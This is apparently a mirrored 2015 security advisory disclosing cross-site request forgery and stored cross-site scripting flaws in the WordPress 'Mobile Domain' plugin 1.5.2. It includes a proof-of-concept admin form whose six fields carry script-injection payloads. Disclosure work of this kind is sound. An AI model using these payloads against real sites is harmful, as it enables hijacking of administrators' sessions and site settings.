WordPress Mobile Domain plugin version 1.5.2 suffers from cross site request forgery and cross site scripting vulnerabilities.
44749f19263d4959dbc5b494a08c53e09e9fc7c58ffce7f4f8ed9e3ff8c865fbTitle: WordPress 'Mobile Domain' CSRF/XSS
Version: 1.5.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/mobile-domain/
Contacted WordPress: 2015/01/26
==========================================================
## Description:
==========================================================
Redirect WordPress blog from desktop domain to mobile subdomain and create Mobile XML Sitemap.
## CSRF:
==========================================================
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.
## Stored XSS:
==========================================================
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.
PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=mobile-domain&wpmd_action=add-domain">
<input type="text" name="domain" value=""><script>alert(1);</script>"><br />
<input type="text" name="text" value=""><script>alert(2);</script>"><br />
<input type="text" name="font" value=""><script>alert(3);</script>"><br />
<input type="text" name="fontcolor" value=""><script>alert(4);</script>"><br />
<input type="text" name="color" value=""><script>alert(5);</script>"><br />
<input type="text" name="padding" value=""><script>alert(6);</script>"><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix available.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed